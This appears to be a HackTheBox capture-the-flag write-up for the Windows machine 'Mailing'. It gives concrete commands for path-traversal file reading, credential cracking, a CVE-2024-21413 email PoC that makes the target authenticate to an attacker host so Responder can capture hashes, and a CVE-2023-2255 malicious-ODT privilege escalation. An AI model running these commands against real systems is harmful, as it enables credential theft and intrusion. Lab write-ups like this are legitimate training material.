HTB: mailing Writeup

Machine Information

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐☆☆☆
• Real-world: ⭐⭐⭐☆☆
• CVE: ⭐⭐☆☆☆
• CTF-like: ⭐⭐☆☆☆

Summary

mailing is an Easy-difficulty Windows machine running hMailServer and Microsoft IIS. The attack leverages Local File Inclusion (LFI) to extract credentials, CVE-2024-21413 (Microsoft Outlook MonikerLink RCE) for lateral movement, and CVE-2023-2255 (LibreOffice command injection) for privilege escalation. The exploitation path involves enumerating web endpoints, exploiting path traversal to read sensitive configuration files, extracting and cracking credentials, using the Responder + CVE-2024-21413 technique to capture additional credentials, and finally exploiting LibreOffice to gain administrative access.

TL;DR: LFI → Credential extraction → Responder + CVE-2024-21413 → CVE-2023-2255 → Admin.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.10.11.14

Results:

25/tcp  open  smtp  hMailServer smtpd
80/tcp  open  http  Microsoft IIS httpd 10.0
110/tcp  open  pop3  hMailServer pop3d

Service Enumeration

Hostname: mailing.htb

echo "10.10.11.14 mailing.htb" >> /etc/hosts

Web Enumeration:

gobuster dir -u http://mailing.htb -w /usr/share/wordlists/common.txt

Directory Scan Results:

/admin           (Status: 403)
/assets          (Status: 200)
/download.php    (Status: 200)

Vulnerability Assessment

Identified Vulnerabilities:

• Local File Inclusion (LFI) — Path traversal in download.php endpoint
• CVE-2024-21413 — Microsoft Outlook Remote Code Execution (MonikerLink)
• CVE-2023-2255 — LibreOffice command injection via ODT files

Initial Foothold

Step 1: Local File Inclusion via download.php

The download.php endpoint is vulnerable to path traversal. Using directory traversal sequences (../../../../), we can read arbitrary files from the system.

curl "http://mailing.htb/download.php?file=../../../../Program%20Files/hMailServer/Bin/hMailServer.INI"

This reveals the hMailServer configuration file containing hashed administrator credentials:

Administrator:841bb5acfa6779ae432fd7a4e6600ba7

Step 2: Credential Cracking

The MD5 hash was cracked using CrackStation:

841bb5acfa6779ae432fd7a4e6600ba7 → homenetworkingadministrator

Credentials obtained:

• Username: administrator@mailing.htb
• Password: homenetworkingadministrator

Step 3: POP3 Access

Connected to the POP3 service using the extracted credentials:

telnet 10.10.11.14 110
USER administrator@mailing.htb
PASS homenetworkingadministrator

This provides access to the administrator’s mailbox and enables the next phase of exploitation.

User Compromise

Step 1: CVE-2024-21413 Exploitation (Outlook MonikerLink RCE)

Set up Responder to capture NTLMv2 hashes:

sudo responder -I tun0

Used a Python PoC for CVE-2024-21413 to send a malicious email that triggers the MonikerLink vulnerability:

python3 CVE-2024-21413.py --server mailing.htb --port 587 \
  --username administrator@mailing.htb \
  --password homenetworkingadministrator \
  --sender administrator@mailing.htb \
  --recipient maya@mailing.htb \
  --url '\\10.10.14.12\test' \
  --subject Hi

Result: Responder captured maya’s NTLMv2 hash

Step 2: Credential Cracking

The captured NTLMv2 hash was cracked:

maya's hash → m4y4ngs4ri

New credentials obtained:

• Username: maya
• Password: m4y4ngs4ri

Step 3: User Access via evil-winrm

Connected to the machine using the compromised maya credentials:

evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

whoami /priv
net user
systeminfo
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select DisplayName, DisplayVersion

Key Finding: LibreOffice 7.4 is installed in Program Files

Exploitation via CVE-2023-2255 (LibreOffice Command Injection)

LibreOffice 7.4 is vulnerable to command injection via ODT files through the macro system.

Step 1: Create Python webshell

Create a webshell that runs as the LocalAdmin user:

import os
import subprocess
import socket

# Webshell implementation
# This will run commands with elevated privileges

Transfer the webshell to maya’s desktop:

# Via evil-winrm or other file transfer method
upload webshell.py C:\Users\maya\Desktop\webshell.py

Step 2: Generate malicious ODT

Use the CVE-2023-2255 PoC to generate a malicious ODT file:

python3 CVE-2023-2255.py --cmd 'python C:\Users\maya\Desktop\webshell.py' --output 'exploit.odt'

Step 3: Trigger the exploit

Open the malicious ODT file. LibreOffice executes the embedded command with the current user’s privileges, allowing command execution as LocalAdmin.

Note: PHP shells were being automatically removed after ~2 seconds, so a persistent Python shell was used instead.

Root Flag

cat C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance<br/>nmap + gobuster"] --> B["LFI via download.php<br/>Path Traversal"]
    B --> C["Extract hMailServer.INI<br/>Get Administrator Hash"]
    C --> D["Crack MD5 Hash<br/>homenetworkingadministrator"]
    D --> E["POP3 Access<br/>Administrator Credentials"]
    E --> F["CVE-2024-21413<br/>Send Malicious Email"]
    F --> G["Responder Captures<br/>maya NTLMv2 Hash"]
    G --> H["Crack NTLMv2<br/>m4y4ngs4ri"]
    H --> I["evil-winrm Access<br/>User: maya"]
    I --> J["Enumerate System<br/>Find LibreOffice 7.4"]
    J --> K["CVE-2023-2255<br/>Malicious ODT Exploit"]
    K --> L["Command Injection<br/>Execute Python Webshell"]
    L --> M["LocalAdmin Access<br/>Privilege Escalation Complete"]

Tools Used

Vulnerability Reference

Key Learnings

• Path Traversal in File Operations: Input validation on file paths is critical. The download.php endpoint’s failure to properly sanitize the file parameter allowed direct access to system configuration files.

• Configuration File Security: Sensitive files like hMailServer.INI should never be readable by the web server process. hMailServer credential hashes were directly accessible through the LFI vulnerability.

• Email Protocol Exploitation: SMTP services can be weaponized to deliver attack payloads. CVE-2024-21413 demonstrates how email can trigger Remote Code Execution in Outlook/related clients without user interaction.

• Hash Cracking and Rainbow Tables: Both MD5 and NTLMv2 hashes were quickly cracked using online services. Modern password cracking requires strong, unique passwords that cannot be found in common databases.

• Responder for Credential Capture: Responder’s ability to poison LLMNR/NBT-NS and capture authentication hashes is a powerful technique for lateral movement when combined with vulnerabilities that trigger authentication attempts.

• Installed Software as Attack Surface: LibreOffice’s command injection vulnerability (CVE-2023-2255) demonstrates that every installed application should be inventoried and checked for known vulnerabilities during the enumeration phase.

• Webshell Persistence: PHP-based shells may be automatically removed or filtered. Python webshells or other persistent mechanisms may be more reliable for maintaining access.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Easy #CVE-2023-2255 #CVE-2024-21413